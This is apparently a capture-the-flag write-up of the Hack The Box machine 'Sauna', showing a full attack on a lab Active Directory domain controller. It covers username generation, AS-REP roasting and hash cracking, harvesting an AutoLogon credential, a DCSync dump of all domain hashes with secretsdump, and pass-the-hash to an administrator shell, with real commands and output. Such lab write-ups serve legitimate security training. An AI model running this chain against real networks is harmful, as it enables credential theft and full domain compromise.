Recon

Nmap Scan

# Nmap 7.80 scan initiated Mon May 18 08:49:29 2020 as: nmap -sC -sV -oN nmap/initial 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.18s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-18 07:49:48Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=5/18%Time=5EC1DBAF%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h00m00s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-05-18T07:52:14
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 18 08:54:51 2020 -- 1 IP address (1 host up) scanned in 322.12 seconds

Port 80 is all static pages with nothing interesting on it, but the site yields a good number of employee names. Two details in the scan matter later: the host reports a clock skew of 7h00m00s, and Kerberos rejects requests whose timestamp is more than 5 minutes off by default, so any step that authenticates with Kerberos rather than NTLM needs the attacking box's clock synced to the DC first; and SMB signing is enabled and required, which rules out NTLM relay to SMB on this host.

Nmap's LDAP script gives the domain as EGOTISTICAL-BANK.LOCAL:

rootDomainNamingContext: DC=EGOTISTICAL-BANK,DC=LOCAL

Given the usual Active Directory naming conventions, a simple Python script turns those names into a list of candidate usernames:

#!/usr/bin/env python3
# Build candidate AD usernames from "First Last" names scraped from the website.
# Conventions tried: first.last, first.a.last, flast, falast (middle-initial
# variants) and first + first three letters of last.

with open('username.txt', 'r') as f:   # 'rw' is not a valid mode; read-only is enough
    lines = f.readlines()

name = []
for i in lines:
    parts = i.strip().split(' ')
    if len(parts) < 2:                  # skip blank or single-word lines
        continue
    first_name, last_name = parts[0], parts[1]

    name.append(first_name + '.' + last_name)
    name.append(first_name + '.a.' + last_name)

    name.append(first_name[:1] + last_name)
    name.append(first_name[:1] + 'a' + last_name)

    name.append(first_name + last_name[:3])

for i in name:
    print(i)

User.txt

The generated usernames:

~/Documents/HTB/Sauna root@kali
❯ cat username.list
Fergus.Smith
Fergus.a.Smith
FSmith
FaSmith
FergusSmi
Shaun.Coins
Shaun.a.Coins
SCoins
SaCoins
ShaunCoi
Hugo.Bear
Hugo.a.Bear
HBear
HaBear
HugoBea
Bowie.Taylor
Bowie.a.Taylor
BTaylor
BaTaylor
BowieTay
Sophie.Driver
Sophie.a.Driver
SDriver
SaDriver
SophieDri
Steven.Kerb
Steven.a.Kerb
SKerb
SaKerb
StevenKer

Run GetNPUsers.py over the list to AS-REP roast: for any user whose account has Kerberos pre-authentication disabled, the KDC hands back an AS-REP whose encrypted part can be cracked offline. Names the KDC does not know come back as KDC_ERR_C_PRINCIPAL_UNKNOWN, so the run doubles as a username-existence check (a valid user that still requires pre-auth is reported without a hash):

~/Documents/HTB/Sauna root@kali
❯ GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile /root/Documents/HTB/Sauna/username.list -dc-ip 10.10.10.175
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:46a8d7b10066d385f674ed31ee26bc2a$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
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

Crack the hash offline with hashcat (mode 18200, Kerberos 5 AS-REP etype 23) to recover the plaintext password:

$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:471568f0203a51c89bbe1f615aaf7592$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:Thestrokes23

Log in over WinRM as FSmith with Evil-WinRM and read user.txt:


C:\>cd users/FSmith/desktop
C:\users\FSmith\desktop>type user.txt
1b5520b98d97cf17f24122a55baf70cf

C:\users\FSmith\desktop>

Privilege Escalation

  1. Upload winPEAS.exe; it finds an AutoLogon credential stored in the registry:
[+] Looking for AutoLogon credentials(T1012)
Some AutoLogon credentials were found!!
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!

Log in as svc_loanmgr with that password and upload SharpHound.exe to collect more information about the AD domain. Note that the AutoLogon entry names the account svc_loanmanager, which is not a domain account (the secretsdump output later in this writeup lists svc_loanmgr, RID 1108, and no svc_loanmanager); the stored password simply also works for svc_loanmgr.

PS C:\users\svc_loanmgr\Documents> wget 10.10.16.38/SharpHound.exe -o SharpHound.exe
PS C:\users\svc_loanmgr\Documents> dir


Directory: C:\users\svc_loanmgr\Documents


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/19/2020 4:11 AM 832512 SharpHound.exe


PS C:\users\svc_loanmgr\Documents> ./SharpHound.exe
-----------------------------------------------
Initializing SharpHound at 4:11 AM on 5/19/2020
-----------------------------------------------

Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain EGOTISTICAL-BANK.LOCAL using path CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
[+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 19 MB RAM
Status: 60 objects finished (+60 4)/s -- Using 27 MB RAM
Enumeration finished in 00:00:15.1741120
Compressing data to .\20200519041151_BloodHound.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 4:12 AM on 5/19/2020! Happy Graphing!

PS C:\users\svc_loanmgr\Documents> dir


Directory: C:\users\svc_loanmgr\Documents


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/19/2020 4:12 AM 9142 20200519041151_BloodHound.zip
-a---- 5/19/2020 4:11 AM 832512 SharpHound.exe
-a---- 5/19/2020 4:12 AM 11187 ZDFkMDEyYjYtMmE1ZS00YmY3LTk0OWItYTM2OWVmMjc5NDVk.bin


PS C:\users\svc_loanmgr\Documents>

Pull the zip back and load it into BloodHound: svc_loanmgr holds the GetChangesAll (DS-Replication-Get-Changes-All) extended right on the domain object, so it can run a DCSync attack and request the password hash of any principal from the DC over DRSUAPI. DCSync needs both DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on the domain head, which is why BloodHound draws its DCSync edge only when a principal has both; secretsdump.py with -just-dc issues exactly that replication request:

root@kali:~/Documents/HTB/Sauna# secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmgr:"Moneymakestheworldgoround!"@10.10.10.175 -just-dc
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:e5121be48d87ef3c8f22a887adfe8ed5:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:fe0bd95e0547a5e344b6b4a33e0d3968a54164c620ebdd82ba67e6b68f5986f5
SAUNA$:aes128-cts-hmac-sha1-96:a4be6aec07b2eaf7c1133e8a734d7c29
SAUNA$:des-cbc-md5:3e677c9ec7ecb045
[*] Cleaning up...
root@kali:~/Documents/HTB/Sauna#
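A small triage pass over that dump, added here as an example and not part of the original writeup. It parses the NTLM lines, groups accounts by NT hash (NT hashes are unsalted, so HSmith and FSmith sharing 58a52d36c84fb7f5f1beab9a201db1dd means HSmith's password is also Thestrokes23), flags blank passwords and any LM hash other than the empty one, and builds the lm:nt value the next step hands to wmiexec.py. The input is copied from the secretsdump output above; the Kerberos keys section is omitted.

```python
#!/usr/bin/env python3
# Triage of secretsdump.py -just-dc output.  Added example, not part of the
# writeup: groups accounts that share an NT hash (unsalted, so shared hash means
# shared password), flags blank passwords and stored LM hashes, and produces the
# -hashes argument for pass-the-hash with wmiexec.py / psexec.py.
from collections import defaultdict
import re

# The NTLM section of the secretsdump output above.
SECRETSDUMP_OUTPUT = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:e5121be48d87ef3c8f22a887adfe8ed5:::
"""

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM("") : LM storage disabled, the normal case
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT("") : the account has a blank password
LINE_RE = re.compile(r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$")

def parse_ntlm_lines(text):
    """Return [(user, rid, lm, nt)] for each domain\\uid:rid:lmhash:nthash::: line."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rows.append((m["user"], int(m["rid"]), m["lm"], m["nt"]))
    return rows

def shared_nt_hashes(rows):
    """NT hash -> accounts using it, restricted to hashes held by more than one account."""
    by_hash = defaultdict(list)
    for user, _, _, nt in rows:
        by_hash[nt].append(user)
    return {nt: users for nt, users in by_hash.items() if len(users) > 1}

def triage(rows):
    """(user, finding) pairs for blank passwords and LM hashes that are still stored."""
    findings = []
    for user, _, lm, nt in rows:
        if nt == EMPTY_NT:
            findings.append((user, "blank password"))
        if lm != EMPTY_LM:
            findings.append((user, "LM hash stored"))
    return findings

def pth_hashes(rows, user):
    """The lm:nt string to pass as -hashes for `user` (domain prefix ignored, case-insensitive)."""
    for name, _, lm, nt in rows:
        if name.split("\\")[-1].lower() == user.lower():
            return f"{lm}:{nt}"
    raise KeyError(user)

if __name__ == "__main__":
    rows = parse_ntlm_lines(SECRETSDUMP_OUTPUT)
    for nt, users in shared_nt_hashes(rows).items():
        print(f"password reuse: {', '.join(users)} share NT hash {nt}")
    for user, finding in triage(rows):
        print(f"{finding}: {user}")
    print("wmiexec.py ... -hashes", pth_hashes(rows, "Administrator"))
```

Guest shows the empty-password NT hash; whether that matters depends on the account being enabled, which secretsdump reports when run with -user-status.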

Pass the Administrator NT hash straight to wmiexec.py (no cracking needed) and read root.txt:

~/Documents/HTB/Sauna root@kali 49s
❯ wmiexec.py EGOTISTICAL-BANK.LOCAL/administrator@10.10.10.175 -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>cd users/administrator/desktop
C:\users\administrator\desktop>type root.txt
f3ee04965c68257382e31502cc5e881f
C:\users\administrator\desktop>